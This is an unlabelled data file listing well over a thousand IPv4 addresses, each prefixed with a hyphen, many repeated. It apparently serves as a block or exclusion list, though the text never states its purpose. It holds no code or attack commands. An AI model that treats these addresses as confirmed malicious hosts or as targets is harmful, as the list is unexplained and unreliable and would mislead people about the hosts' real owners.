-183.15.126.194 -218.17.117.55 -54.223.16.217 -139.224.15.218 -125.89.69.202 -120.196.114.171 -116.6.50.138 -103.36.90.58 -103.36.90.58 -103.36.90.58 -115.29.226.59 -58.56.229.26 -103.36.90.58 -81.69.236.243 -111.45.126.19 -111.45.126.104 -113.116.89.117 -111.45.126.14 -61.177.223.85 -103.36.90.58 -219.146.165.142 -120.24.73.87 -103.36.90.58 -218.90.242.242 -101.43.56.7 -103.36.90.58 -124.207.15.178 -103.36.90.58 -36.112.95.70 -61.218.53.110 -58.242.27.34 -125.89.62.198 -123.176.98.64 -103.36.90.58 -59.173.236.220 -60.250.47.7 -118.163.165.57 -183.14.78.220 -47.101.54.205 -47.92.55.5 -125.76.225.59 -120.76.240.4 -183.49.86.71 -183.128.145.231 -60.190.192.90 -220.231.188.111 -103.36.90.58 -223.70.197.114 -1.63.24.213 -222.180.194.146 -60.165.152.58 -103.36.90.58 -202.153.117.131 -121.250.80.234 -60.171.147.207 -116.7.249.83 -103.36.90.58 -103.36.90.58 -182.136.162.228 -113.119.8.36 -47.103.147.248 -221.237.156.103 -218.94.78.213 -218.22.191.82 -110.186.228.112 -121.9.200.46 -218.94.38.181 -218.94.50.26 -110.185.210.70 -182.150.44.133 -218.94.26.14 -218.94.50.26 -182.151.215.120 -118.113.147.160 -210.51.21.32 -183.192.160.93 -14.215.221.106 -125.64.15.191 -118.163.135.40 -218.89.68.185 -110.185.168.41 -218.94.50.26 -112.2.3.231 -222.82.226.214 -116.1.148.207 -182.136.173.38 -112.30.157.23 -183.49.44.25 -103.36.90.58 -58.222.88.194 -103.36.90.58 -183.63.167.14 -139.196.76.97 -106.12.241.121 -103.36.90.58 -113.106.6.61 -114.55.250.251 -121.41.39.195 -122.224.86.139 -183.63.205.83 -124.71.196.182 -103.36.90.58 -36.7.170.117 -106.52.4.39 -220.249.204.70 -183.192.160.94 -219.159.88.106 -103.36.90.58 -122.226.2.18 -103.36.90.58 -103.36.90.58 -222.222.77.197 -180.141.90.60 -47.103.147.248 -52.131.235.107 -103.36.90.58 -183.62.67.171 -183.62.67.172 -218.75.99.138 -103.36.90.58 -116.128.228.13 -110.186.229.90 -125.89.35.90 -60.205.157.59 -119.129.118.175 -220.180.10.211 -218.13.183.106 -123.56.126.109 -124.223.160.174 -211.21.163.78 -61.146.129.6 -39.100.232.162 -120.77.55.240 -220.160.52.54 -110.87.24.134 -103.36.90.58 -121.235.76.166 -113.105.129.162 -1.117.199.9 -106.13.17.242 -120.25.95.92 -59.49.137.229 -103.36.90.54 -221.0.92.172 -183.6.112.79 -183.149.244.105 -211.144.5.82 -218.22.206.38 -54.223.8.205 -203.74.132.224 -114.55.250.251 -121.31.124.114 -103.36.90.58 -103.36.90.58 -101.201.79.220 -103.36.90.58 -122.225.94.86 -113.125.138.8 -103.36.90.58 -220.166.241.231 -103.36.90.58 -111.45.125.43 -58.40.19.126 -223.75.103.168 -106.12.240.28 -122.227.66.174 -119.127.17.44 -58.59.4.146 -111.45.125.42 -221.213.63.227 -222.217.65.32 -210.26.80.167 -139.198.19.189 -183.129.216.58 -202.103.149.12 -125.74.28.15 -103.36.90.54 -61.150.106.5 -61.153.183.6 -211.72.110.41 -122.224.137.166 -116.7.73.132 -117.122.214.12 -139.159.213.182 -103.36.90.58 -124.223.160.174 -125.78.45.187 -61.146.129.6 -202.103.149.11 -120.24.153.68 -61.189.223.215 -103.36.90.58 -119.129.112.42 -180.166.26.202 -220.130.230.137 -120.24.153.68 -42.48.174.1 -112.74.132.122 -218.22.139.50 -222.88.11.67 -220.178.243.101 -103.36.90.58 -117.158.24.187 -103.36.90.58 -183.232.177.245 -119.131.210.114 -59.120.19.8 -106.14.145.155 -61.153.30.100 -111.26.178.75 -120.132.14.149 -111.26.178.69 -220.130.170.93 -103.36.90.58 -210.14.147.116 -116.236.137.66 -110.80.1.70 -58.216.209.18 -220.112.0.54 -58.144.7.23 -120.196.110.196 -220.231.128.19 -124.128.8.186 -113.116.124.164 -120.82.178.130 -112.73.90.232 -202.100.252.162 -59.36.19.83 -121.15.186.234 -103.36.90.58 -218.80.196.134 -103.36.90.58 -221.0.92.172 -61.220.34.20 -61.220.34.21 -60.190.250.75 -103.36.90.58 -183.240.87.132 -59.56.175.120 -221.231.123.54 -125.89.35.168 -103.36.90.58 -1.192.217.116 -111.38.191.10 -218.63.77.135 -14.126.204.123 -54.223.16.217 -103.36.90.58 -47.99.118.92 -103.36.90.51 -39.105.25.143 -182.92.222.46 -113.118.74.249 -117.30.223.74 -118.25.106.87 -222.128.26.227 -180.112.66.221 -183.149.242.80 -111.33.66.27 -222.222.77.197 -112.254.90.89 -59.37.41.230 -113.208.116.110 -180.76.125.57 -103.36.90.58 -103.36.90.58 -103.36.90.58 -103.36.90.58 -47.110.240.159 -222.187.132.30 -101.96.130.117 -61.182.49.86 -103.36.90.58 -47.96.253.227 -116.7.72.252 -220.180.229.226 -113.119.8.44 -103.36.90.58 -112.26.50.171 -122.147.13.206 -60.205.157.59 -183.60.143.121 -222.86.208.98 -222.168.22.46 -222.214.175.182 -218.75.87.186 -113.125.14.115 -210.21.248.74 -222.84.119.91 -1.15.165.163 -58.211.170.230 -120.202.46.126 -122.225.40.106 -103.36.90.54 -39.107.192.17 -47.94.255.75 -47.105.106.119 -182.61.131.107 -210.51.21.33 -103.36.90.58 -121.15.166.36 -220.167.138.85 -120.197.8.211 -183.57.22.102 -124.160.109.135 -61.150.65.202 -113.204.144.192 -221.226.86.249 -14.116.147.83 -210.51.191.100 -121.37.189.174 -140.206.74.75 -211.67.156.80 -210.72.96.52 -117.122.214.11 -122.228.193.253 -47.103.147.248 -103.36.90.58 -61.142.120.178 -103.36.90.58 -203.156.196.67 -103.36.90.58 -61.141.138.119 -52.83.102.131 -124.205.192.122 -103.36.90.58 -61.218.92.101 -183.240.87.132 -183.129.218.236 -183.247.156.247 -218.201.223.161 -116.255.201.6 -125.74.207.131 -120.24.213.234 -180.166.182.150 -183.230.32.40 -116.247.85.29 -103.36.90.58 -106.12.241.132 -103.36.90.58 -211.136.105.28 -118.163.165.59 -103.36.90.58 -202.82.135.156 -103.36.90.58 -47.90.98.186 -118.113.146.122 -183.230.2.7 -54.223.134.7 -61.163.246.4 -120.27.152.145 -182.136.166.190 -103.36.90.58 -113.106.22.37 -61.189.223.215 -113.106.103.32 -121.41.1.151 -113.116.126.60 -222.66.235.230 -218.15.173.10 -103.36.90.58 -14.215.220.230 -103.36.90.58 -124.162.128.3 -218.24.163.157 -61.190.70.53 -183.57.20.58 -122.144.168.90 -183.50.207.44 -103.36.90.58 -140.143.229.212 -120.236.83.36 -183.3.138.8 -113.108.203.238 -122.225.40.106 -122.144.178.194 -116.54.81.150 -116.54.81.240 -103.36.90.58 -101.231.77.77 -222.179.155.7 -180.109.38.121 -103.36.90.58 -103.36.90.58 -125.89.69.201 -60.190.238.102 -103.36.90.58 -61.189.223.215 -61.142.120.214 -121.37.189.174 -61.142.120.178 -103.36.90.58 -221.208.0.165 -218.22.93.234 -14.126.205.57 -111.230.247.248 -60.249.36.121 -220.160.56.135 -103.36.90.58 -121.228.202.101 -182.119.118.106 -61.142.120.214 -180.112.156.181 -103.36.90.58 -112.111.2.14 -61.189.223.215 -111.198.128.154 -111.198.128.138 -218.23.59.202 -106.12.241.133 -60.173.184.226 -116.128.228.13 -47.95.10.192 -183.63.182.188 -58.210.161.106 -59.37.162.66 -139.170.8.177 -220.196.52.79 -120.237.157.188 -113.105.200.141 -125.107.176.154 -222.92.35.130 -113.116.124.216 -180.113.20.243 -47.114.82.37 -110.87.24.83 -122.224.157.214 -211.141.224.40 -103.36.90.58 -183.149.246.159 -122.224.240.66 -140.246.60.114 -60.209.64.47 -103.36.90.58 -103.36.90.58 -14.155.223.36 -103.36.90.58 -117.131.145.94 -42.96.170.222 -117.131.145.93 -116.7.72.122 -103.36.90.58 -125.89.67.38 -120.226.245.190 -183.57.20.59 -210.51.21.80 -220.165.9.75 -103.36.90.58 -103.36.90.58 -49.235.198.61 -125.120.253.196 -61.219.81.101 -218.1.100.235 -124.220.4.242 -47.101.178.8 -220.160.52.213 -36.32.191.42 -116.62.7.174 -183.224.71.173 -120.209.82.248 -183.63.182.188 -183.234.151.243 -120.78.159.216 -106.12.241.132 -106.12.241.133 -211.75.183.11 -119.3.25.72 -183.15.206.112 -58.247.111.13 -219.139.148.5 -113.105.203.108 -103.36.90.58 -101.95.21.178 -103.36.90.58 -112.81.63.243 -218.16.129.171 -103.36.90.58 -101.200.176.11 -113.116.126.243 -39.153.251.159 -182.92.241.35 -118.186.244.242 -139.196.198.125 -219.146.165.142 -121.13.252.164 -222.185.251.42 -150.242.238.7 -125.91.233.182 -110.80.1.70 -116.7.72.178 -211.140.29.42 -210.51.21.79 -1.192.217.116 -219.131.198.93 -117.184.125.89 -183.62.177.82 -219.138.127.14 -103.36.90.58 -47.102.84.124 -116.128.228.13 -47.100.0.79 -120.237.118.132 -124.222.34.242 -124.222.235.114 -60.174.128.86 -143.89.138.2 -47.100.182.26 -60.30.26.217 -61.181.111.162 -106.53.145.170 -183.149.246.115 -114.225.23.212 -220.128.84.98 -103.36.90.58 -103.36.90.45 -113.107.155.229 -47.103.37.193 -58.243.104.26 -163.177.103.163 -143.89.138.2 -221.224.249.34 -180.113.22.160 -125.74.219.12 -116.22.199.79 -121.18.68.215 -103.36.90.58 -218.23.185.20 -103.36.90.58 -125.89.35.118 -114.116.47.69 -222.77.183.67 -39.103.218.217 -210.51.21.33 -59.37.171.156 -60.172.48.193 -122.159.45.107 -111.26.178.69 -222.82.233.138 -60.30.52.205 -223.220.154.203 -61.189.223.215 -124.128.8.188 -61.164.80.130 -221.4.210.180 -183.214.181.133 -14.126.206.59 -183.62.233.113 -210.5.23.52 -101.37.169.10 -124.134.14.144 -113.106.103.32 -39.107.87.29 -59.46.25.29 -211.136.182.25 -116.247.77.217 -125.107.160.176 -122.225.64.9 -36.133.219.183 -111.26.178.75 -113.108.138.211 -117.141.159.125 -120.194.49.246 -218.75.223.247 -125.120.249.251 -101.37.169.10 -124.117.210.154 -222.174.89.26 -118.163.52.123 -59.69.208.38 -183.214.173.230 -61.143.157.132 -121.40.150.225 -45.121.52.114 -116.62.196.220 -117.9.124.196 -183.230.36.27 -121.40.150.225 -81.70.105.149 -120.236.109.99 -183.192.160.93 -118.163.147.155 -113.116.180.246 -183.192.160.94 -47.103.147.248 -111.26.178.75 -222.90.136.116 -110.80.45.30 -103.36.90.58 -112.6.36.11 -117.131.145.95 -61.216.49.237 -112.111.1.132 -221.130.126.150 -139.170.8.97 -111.26.178.75 -111.26.178.69 -58.222.133.166 -222.134.52.200 -123.157.233.194 -61.181.112.18 -139.196.198.125 -123.138.180.142 -120.204.247.42 -113.102.141.37 -117.159.34.15 -202.100.206.166 -101.37.169.10 -101.89.139.21 -121.5.28.247 -120.79.167.105 -223.68.139.28 -101.37.247.40 -218.1.100.235 -112.30.157.122 -61.129.71.54 -221.130.79.150 -47.112.197.40 -180.109.127.164 -222.66.79.116 -47.106.15.235 -47.102.135.51 -183.62.131.66 -103.36.90.58 -119.60.5.198 -220.180.111.10 -116.6.106.131 -116.7.74.1 -61.93.207.122 -112.74.112.170 -202.103.149.11 -183.50.207.251 -103.36.90.58 -163.179.127.69 -103.36.90.58 -47.101.221.149 -113.116.90.38 -125.78.45.186 -117.57.64.165 -117.14.30.204 -121.37.198.9 -115.239.207.182 -103.36.90.54 -112.30.195.10 -101.200.82.187 -202.133.248.92 -121.5.240.104 -222.85.192.46 -103.36.90.58 -120.25.95.92 -114.220.127.208 -210.63.211.36 -103.36.90.58 -218.16.212.179 -220.189.249.54 -120.78.166.4 -183.207.196.123 -220.166.241.183 -180.141.90.61 -112.29.244.171 -110.53.162.169 -125.88.37.178 -1.119.139.243 -222.223.19.166 -210.65.139.157 -111.1.73.98 -218.198.32.204 -218.198.32.206 -36.110.122.19 -124.205.195.213 -120.79.191.162 -116.62.247.104 -218.198.32.203 -113.105.152.175 -115.29.198.7 -61.189.223.215 -120.198.22.25 -47.100.236.30 -119.146.180.29 -183.63.225.100 -125.89.35.34 -114.252.238.130 -122.228.169.150 -59.125.118.224 -121.11.17.114 -119.146.149.30 -112.29.245.125 -124.129.21.44 -60.160.129.181 -221.202.72.223 -218.18.6.227 -103.36.90.58 -150.138.216.118 -39.108.117.194 -183.149.235.59 -220.130.187.129 -103.36.90.58 -112.25.65.55 -103.36.90.58 -180.112.65.100 -175.98.127.170 -59.42.202.195 -183.57.23.180 -124.223.109.10 -183.149.236.7 -211.162.67.19 -58.242.212.193 -121.4.47.195 -47.104.17.89 -120.192.179.176 -119.23.226.149 -112.227.85.183 -218.206.140.30 -122.225.203.168 -218.206.140.125 -112.26.60.178 -202.201.64.251 -120.79.200.186 -60.214.64.50 -103.36.90.58 -52.83.102.131 -47.110.38.183 -218.75.223.247 -103.36.90.58 -112.65.117.14 -60.165.62.104 -61.191.31.26 -117.82.26.249 -113.200.77.151 -183.63.205.83 -103.36.90.58 -183.131.137.238 -125.46.3.211 -183.203.214.249 -103.36.90.58 -116.24.189.144 -203.198.152.185 -119.188.116.54 -218.29.196.220 -171.217.59.60 -113.110.201.102 -112.6.128.114 -111.26.178.69 -114.55.141.24 -120.27.152.145 -1.119.139.245 -112.74.59.163 -112.31.12.214 -103.36.90.58 -202.158.165.147 -103.36.90.58 -58.250.152.111 -59.56.175.120 -103.36.90.58 -218.202.96.154 -124.222.54.81 -106.13.17.242 -60.171.34.193 -116.7.74.206 -103.36.90.58 -61.189.243.28 -180.169.153.106 -111.59.87.35 -113.92.167.41 -113.105.152.168 -112.26.60.94 -183.17.229.98 -59.47.0.62 -180.168.195.209 -210.51.21.32 -47.103.147.248 -60.171.250.31 -118.163.165.57 -118.163.165.55 -223.13.120.22 -59.33.246.254 -121.5.180.176 -58.219.62.86 -123.13.202.225 -183.149.233.50 -101.52.236.151 -222.186.144.65 -117.30.223.211 -47.93.37.246 -112.16.203.230 -121.4.247.107 -218.90.95.202 -39.104.53.129 -218.6.146.162 -182.245.143.29 -120.79.112.135 -121.17.168.179 -223.95.210.225 -59.46.233.53 -175.24.119.235 -121.4.245.240 -121.5.114.64 -117.144.200.66 -1.15.183.174 -175.6.14.120 -118.113.146.215 -180.109.35.143 -119.23.44.93 -123.60.213.149 -220.161.145.117 -123.139.46.32 -113.116.19.226 -103.36.90.58 -103.36.90.58 -220.194.142.3 -116.7.75.234 -112.29.238.36 -47.101.56.243 -222.184.54.100 -103.36.90.58 -202.120.199.148 -112.111.2.14 -112.6.88.182 -111.26.178.75 -103.36.90.58 -180.152.157.47 -103.36.90.58 -117.30.223.148 -113.105.201.62 -113.110.203.57 -39.88.192.81 -111.26.178.69 -120.76.56.162 -103.36.90.58 -59.42.61.31 -103.36.90.58 -59.61.118.48 -115.230.119.195 -180.76.52.24 -119.23.20.233 -119.23.129.22 -14.126.204.95 -219.87.177.198 -81.68.217.101 -47.107.191.72 -183.95.255.254 -47.93.130.154 -112.112.90.162 -183.60.143.121 -112.115.17.217 -47.103.41.143 -221.130.161.52 -39.108.52.222 -60.173.113.172 -113.116.125.65 -103.36.90.58 -222.76.49.10 -183.149.246.32 -120.25.223.224 -121.238.109.212 -112.227.84.116 -180.169.154.51 -59.61.214.103 -122.116.167.81 -58.20.63.222 -120.79.179.156 -122.228.157.34 -14.126.206.121 -114.252.231.13 -219.138.229.40 -47.112.200.246 -47.106.20.6 -118.163.165.59 -118.163.165.55 -119.23.128.121 -116.236.128.77 -119.23.128.80 -61.189.43.61 -60.177.243.139 -47.112.222.53 -134.175.220.239 -103.36.90.58 -183.15.204.159 -117.30.222.114 -123.235.54.122 -221.4.214.11 -103.36.90.58 -180.112.65.124 -103.36.90.58 -103.36.90.58 -219.139.35.84 -47.119.137.189 -103.36.90.58 -111.26.178.69 -122.112.245.192 -112.54.44.17 -103.36.90.58 -58.222.88.194 -47.112.201.182 -165.84.176.75 -1.117.199.9 -111.164.173.191 -1.116.14.199 -103.36.90.58 -111.75.249.68 -103.36.90.58 -112.111.2.14 -103.36.90.58 -120.79.247.231 -47.112.167.7 -120.79.242.82 -218.75.223.247 -103.36.90.58 -112.115.17.83 -103.36.90.58 -103.36.90.58 -103.36.90.58 -202.100.211.86 -103.36.90.58 -59.42.61.211 -122.228.169.150 -103.36.90.58 -121.248.67.1 -103.36.90.58 -117.186.228.90 -220.173.143.190 -111.6.77.69 -113.116.127.4 -103.36.90.58 -114.219.155.161 -220.180.15.138 -180.109.32.62 -183.237.248.202 -123.52.55.92 -101.43.106.206 -113.116.183.68 -103.36.90.58 -221.11.70.77 -103.36.90.58 -115.194.25.152 -101.231.76.122 -180.112.169.23 -123.235.155.51 -119.60.13.98 -59.42.90.176 -103.36.90.58 -121.37.189.174 -183.49.86.153 -47.100.97.33 -116.7.75.172 -218.7.208.235 -106.14.183.225 -61.153.224.25 -125.227.102.168 -113.116.181.99 -1.15.103.232 -180.167.203.122 -112.28.19.49 -183.61.164.27 -182.245.143.132 -14.126.206.37 -103.36.90.54 -103.36.90.58 -118.113.147.87 -183.149.250.74 -103.36.90.58 -180.111.110.135 -202.105.183.240 -103.36.90.58 -103.36.90.58 -120.236.2.238 -47.115.137.107 -117.85.142.157 -103.36.90.58 -103.36.90.58 -180.168.88.68 -103.36.90.58 -103.36.90.58 -114.223.226.170 -110.87.25.207 -103.36.90.58 -183.158.30.102 -218.7.208.235 -103.36.90.58 -103.36.90.58 -180.76.49.221 -111.164.174.134 -180.166.26.202 -42.194.226.30 -111.45.123.151 -111.45.123.143 -113.69.149.158 -222.24.62.83 -60.26.89.0 -120.76.102.204 -116.228.123.169 -103.36.90.58 -39.108.5.76 -162.14.131.47 -220.166.243.158 -103.36.90.58 -47.99.58.90 -220.160.52.54 -103.36.90.58 -47.99.58.90 -120.79.92.20 -111.62.32.82 -111.62.32.83 -218.90.94.130 -47.99.216.159 -113.116.126.139 -117.84.208.57 -183.149.231.231 -119.129.115.242 -119.23.140.2 -183.162.253.64 -103.36.90.58 -103.36.90.58 -47.99.53.133 -106.52.135.170 -103.36.90.58 -119.23.184.20 -60.173.184.226 -119.145.248.9 -113.65.194.9 -180.166.26.202 -218.86.39.126 -52.80.21.212 -221.179.119.18 -60.189.111.194 -103.36.90.58 -163.29.17.157 -112.111.2.14 -117.56.218.157 -14.155.222.158 -120.26.199.26 -222.186.144.20 -111.59.117.11 -150.158.159.132 -210.243.86.75 -139.9.37.175 -103.36.90.58 -59.61.122.100 -103.36.90.58 -103.36.90.58 -115.203.15.184 -103.36.90.58 -120.78.222.152 -183.148.231.254 -103.36.90.58 -119.23.125.88 -103.36.90.58 -114.223.225.163 -120.26.63.125 -47.107.159.134 -183.149.252.250 -119.146.237.210 -202.104.2.215 -220.166.243.148 -120.24.76.114 -47.115.81.91 -103.36.90.58 -119.127.17.248 -111.164.178.108 -103.36.90.58 -103.36.90.58 -119.146.59.58 -119.23.147.91 -112.54.44.17 -111.26.178.69 -81.70.243.183 -183.149.255.172 -117.24.139.46 -60.10.25.27 -120.224.127.77 -103.36.90.58 -103.36.90.58 -60.31.125.54 -103.36.90.58 -120.78.86.214 -222.240.19.131 -183.15.206.111 -47.107.101.30 -103.36.90.58 -117.9.105.15 -103.36.90.58 -113.116.182.78 -125.119.147.201 -116.54.81.219 -183.15.88.131 -60.215.252.248 -220.170.155.240 -150.138.113.155 -180.113.43.85 -117.30.223.69 -183.136.124.36 -116.30.197.246 -103.36.90.58 -180.111.137.194 -111.164.176.190 -103.36.90.58 -111.26.178.75 -122.112.245.192 -117.141.34.29 -120.76.47.76 -103.36.90.58 -218.90.94.81 -183.128.150.154 -220.166.240.151 -14.155.222.223 -117.172.79.242 -222.174.57.170 -183.62.67.172 -183.149.253.168 -114.251.38.75 -162.105.209.146 -183.17.230.78 -101.230.193.62 -47.106.70.253 -120.76.53.91 -183.14.77.201 -113.116.16.46 -120.76.53.110 -103.36.90.58 -103.36.90.58 -120.25.121.18 -117.24.76.186 -103.36.90.58 -60.189.112.167 -114.223.225.51 -113.102.145.80 -59.120.78.225 -58.246.227.150 -36.110.139.234 -202.113.110.31 -180.112.159.69 -222.82.243.5 -180.109.34.90 -119.23.21.123 -119.23.188.38 -180.112.65.125 -218.26.234.155 -115.159.117.226 -120.76.208.45 -218.28.220.122 -113.0.243.90 -120.77.60.94 -203.198.186.69 -103.36.90.58 -103.36.90.58 -218.75.82.22 -103.36.90.58 -218.17.116.133 -120.25.121.18 -103.36.90.58 -114.252.226.12 -218.57.132.112 -116.7.73.81 -14.126.205.155 -120.77.102.223 -113.116.126.152 -124.202.169.110 -116.7.74.87 -183.149.252.101 -1.192.217.116 -111.164.173.78 -110.87.25.228 -103.36.90.58 -103.36.90.58 -115.219.3.17 -119.23.173.119 -103.36.90.58 -119.129.118.233 -103.36.90.58 -113.105.203.51 -120.77.59.103 -103.36.90.58 -103.36.90.58 -110.186.72.53 -103.36.90.58 -106.39.229.148 -1.119.174.218 -103.36.90.58 -103.36.90.58 -114.223.226.203 -124.88.188.199 -183.63.121.149 -59.61.122.81 -116.7.73.216 -103.36.90.58 -113.98.116.192 -218.61.235.58 -116.7.72.231 -103.36.90.58 -103.36.90.58 -47.107.182.50 -116.7.75.218 -180.163.104.57 -61.141.139.11 -120.77.58.76 -61.141.138.80 -39.108.88.170 -113.105.202.81 -103.36.90.58 -39.108.195.84 -124.205.195.213 -219.153.39.135 -106.52.115.145 -125.112.46.91 -123.124.57.175 -61.161.152.98 -125.74.119.88 -59.108.16.228 -117.24.77.214 -183.149.234.38 -180.113.23.81 -8.129.116.213 -103.36.90.58 -119.166.14.161 -117.30.223.151 -116.247.77.62 -123.56.21.234 -103.36.90.58 -220.166.241.28 -120.77.68.39 -103.36.90.58 -103.36.90.58 -120.24.168.60 -120.78.234.100 -114.252.234.35 -122.146.219.245 -117.158.152.33 -61.141.139.154 -59.61.122.39 -103.36.90.58 -219.142.128.15 -119.135.178.58 -202.205.9.13 -221.213.63.227 -111.205.88.136 -120.133.21.147 -183.214.173.230 -60.176.8.213 -103.36.90.58 -222.161.223.196 -183.230.38.242 -36.110.174.82 -103.36.90.58 -118.143.40.59 -116.7.249.82 -223.220.175.67 -120.78.228.251 -153.0.175.7 -112.254.92.195 -218.20.197.185 -113.90.135.147 -218.5.2.251 -110.87.25.148 -121.225.65.141 -39.108.194.99 -183.149.254.82 -103.36.90.58 -220.160.52.54 -120.78.193.86 -114.255.132.229 -113.116.19.136 -60.13.241.95 -103.36.90.58 -117.15.60.125 -103.36.90.58 -103.36.90.58 -119.61.7.12 -47.106.84.182 -1.116.179.21 -118.113.147.107 -183.15.205.196 -103.36.90.58 -183.17.229.242 -218.0.170.16 -14.126.205.204 -183.149.227.177 -120.76.112.179 -117.24.137.211 -59.42.63.120 -118.163.165.59 -183.63.8.126 -134.175.220.239 -113.116.126.153 -47.106.156.144 -218.83.233.90 -114.224.142.201 -120.77.22.217 -121.238.100.187 -117.158.73.181 -218.90.93.117 -113.119.8.56 -117.30.223.39 -120.77.69.167 -39.103.218.217 -113.116.126.175 -103.36.90.58 -60.26.75.95 -1.14.65.53 -103.36.90.58 -120.76.45.94 -183.149.244.36 -180.113.42.30 -120.76.211.73 -119.129.115.144 -112.74.175.208 -112.6.114.175 -223.247.218.4 -103.36.90.58 -211.136.182.25 -222.217.68.117 -202.91.248.87 -114.225.21.149 -47.106.163.147 -112.255.100.52 -8.129.45.85 -218.65.189.46 -182.150.57.94 -59.61.122.248 -119.23.221.10 -202.91.236.87 -106.14.250.74 -120.25.210.238 -121.235.76.22 -183.149.246.134 -116.247.77.61 -210.242.68.225 -120.77.59.131 -8.129.35.203 -202.91.236.87 -58.20.63.222 -60.212.43.253 -202.91.248.87 -115.218.219.85 -120.76.237.221 -103.36.90.58 -59.125.124.196 -202.108.28.15 -61.181.45.114 -120.76.46.125 -49.77.42.50 -122.225.221.42 -202.108.28.15 -125.69.92.165 -183.149.240.88 -121.238.100.204 -39.129.90.216 -39.98.37.95 -222.169.94.16 -193.112.112.30 -120.77.68.250 -58.211.212.115 -103.36.90.58 -117.84.208.108 -183.149.253.142 -120.77.68.37 -117.158.24.187 -223.68.128.220 -47.107.34.220 -103.36.90.58 -116.7.73.92 -120.77.58.52 -47.107.68.58 -220.166.243.80 -113.116.126.190 -220.160.52.54 -120.77.93.158 -116.7.73.164 -58.213.22.146 -183.149.229.207 -114.225.21.167 -183.63.149.4 -116.7.72.157 -14.215.218.106 -61.141.138.173 -180.169.95.137 -183.49.86.211 -103.36.90.58 -117.10.61.242 -124.223.119.181 -113.105.203.13 -60.189.118.185 -180.76.125.32 -183.17.230.153 -39.129.16.141 -111.160.226.43 -60.176.9.195 -113.106.194.20 -125.46.26.5 -114.67.108.97 -47.106.228.32 -116.62.142.137 -116.62.142.137 -119.23.223.111 -113.106.22.37 -103.159.124.158 -117.30.223.48 -122.112.245.192 -114.223.78.129 -111.26.100.252 -218.72.86.238 -47.107.74.119 -113.106.22.37 -27.128.201.239 -134.175.97.128 -116.135.67.19 -113.110.201.83 -183.149.245.213 -120.77.58.149 -123.157.218.11 -60.176.8.140 -58.222.88.194 -221.195.128.42 -120.209.4.22 -120.77.53.12 -221.212.34.204 -1.119.197.178 -59.61.122.232 -113.116.124.66 -222.77.102.5 -123.235.154.159 -180.113.41.224 -222.243.165.102 -47.106.201.91 -125.112.41.149 -113.116.124.46 -113.102.130.255 -113.105.202.244 -220.166.241.162 -47.106.236.111 -103.36.90.58 -103.36.90.58 -111.164.183.195 -114.252.237.237 -60.165.152.58 -116.7.73.143 -103.36.90.58 -120.76.23.112 -117.8.64.32 -125.89.35.116 -47.106.243.234 -59.42.63.12 -116.228.172.182 -113.110.203.17 -139.198.191.15 -119.23.108.35 -222.82.132.175 -61.54.97.209 -8.129.83.159 -110.87.24.18 -114.225.22.125 -183.149.240.218 -202.105.183.153 -125.89.34.208 -111.26.178.69 -114.225.216.56 -47.115.112.128 -183.129.182.28 -120.77.105.224 -112.115.17.147 -182.136.166.37 -120.77.72.73 -113.116.219.195 -113.103.38.238 -112.253.1.119 -113.88.141.173 -118.113.147.14 -47.107.39.141 -223.71.226.116 -222.240.19.131 -125.72.100.30 -52.80.16.140 -59.61.122.85 -47.110.240.159 -183.14.78.112 -118.31.103.155 -113.116.127.225 -111.167.57.139 -42.192.205.80 -218.25.120.108 -58.219.62.80 -111.26.178.75 -103.36.90.58 -120.77.160.204 -113.108.116.101 -183.149.232.3 -117.85.142.185 -125.89.35.68 -60.220.253.156 -112.112.90.238 -103.36.90.58 -106.112.128.51 -121.41.80.94 -58.213.63.170 -47.107.41.27 -121.201.56.39 -220.166.242.230 -116.7.75.230 -61.179.246.235 -113.65.194.231 -120.77.105.154 -117.89.94.224 -47.106.203.35 -125.89.32.226 -139.159.151.54 -114.252.234.252 -116.30.198.107 -49.72.133.20 -113.103.39.41 -116.54.81.130 -114.225.23.199 -101.34.142.142 -113.116.180.190 -183.149.249.26 -8.129.45.162 -49.65.113.195 -27.17.58.86 -103.36.90.58 -124.172.246.189 -183.49.86.222 -116.54.81.102 -113.116.124.92 -183.14.76.64 -180.142.178.40 -183.15.204.163 -47.106.105.77 -183.17.230.254 -113.116.182.85 -121.4.247.66 -221.226.162.244 -221.131.184.194 -47.99.186.107 -116.128.228.13 -221.195.144.144 -180.168.195.211 -47.107.43.94 -113.116.219.98 -113.92.167.4 -183.149.255.206 -222.77.102.112 -116.54.81.128 -119.57.173.20 -101.200.74.118 -115.236.19.67 -47.110.240.159 -58.128.138.3 -221.195.144.144 -59.42.62.15 -183.14.78.27 -117.85.143.244 -220.166.242.161 -210.177.175.188 -36.7.74.128 -120.77.105.148 -49.65.114.115 -125.89.33.66 -223.247.34.249 -115.219.7.1 -211.102.219.243 -47.106.207.180 -211.102.219.245 -120.132.8.188 -60.250.81.38 -120.24.1.234 -124.126.224.48 -183.136.124.169 -119.127.17.239 -221.195.128.42 -183.128.148.188 -36.112.71.138 -117.15.67.213 -116.54.81.220 -139.159.157.170 -114.55.250.251 -218.76.65.100 -182.151.205.217 -218.89.108.204 -112.124.65.12 -116.229.196.247 -113.118.74.255 -139.196.34.215 -112.73.81.245 -8.141.144.156 -103.36.90.58 -183.149.235.135 -222.77.101.240 -106.12.240.166 -58.48.75.98 -8.129.47.128 -59.42.63.70 -185.209.40.205 -47.98.40.27 -60.189.118.152 -39.106.132.211 -112.112.90.53 -112.73.81.245 -122.224.120.93 -115.174.67.210 -114.223.226.31 -123.124.57.172 -101.201.63.155 -120.77.170.10 -112.73.81.227 -220.166.243.77 -115.239.240.114 -116.54.57.208 -60.215.242.145 -117.9.107.231 -54.223.38.232 -113.116.125.168 -223.241.247.198 -111.43.108.164 -183.14.79.202 -60.191.195.114 -202.96.99.37 -112.73.81.245 -183.95.255.254 -117.9.104.100 -103.36.90.58 -110.87.24.43 -124.116.176.73 -60.215.251.179 -112.73.81.245 -220.173.139.43 -218.28.179.195 -115.174.67.253 -116.7.73.53 -61.93.249.10 -183.136.111.104 -110.42.220.130 -60.189.114.22 -103.36.90.58 -47.106.200.113 -8.129.45.85 -218.84.182.197 -220.130.199.131 -111.198.141.10 -110.86.5.194 -115.218.127.43 -116.54.57.21 -220.178.116.66 -120.24.183.51 -52.83.102.131 -183.149.228.76 -124.226.214.213 -61.178.118.17 -14.126.207.215 -222.66.235.230 -36.158.71.198 -61.141.138.97 -183.149.248.218 -220.166.241.62 -123.118.79.25 -120.41.150.167 -218.201.127.142 -125.89.35.121 -122.4.214.65 -218.59.39.43 -112.115.17.149 -120.77.253.42 -113.119.8.149 -202.202.1.175 -120.197.179.107 -39.108.172.157 -103.36.90.58 -183.148.237.83 -120.24.81.25 -112.73.81.245 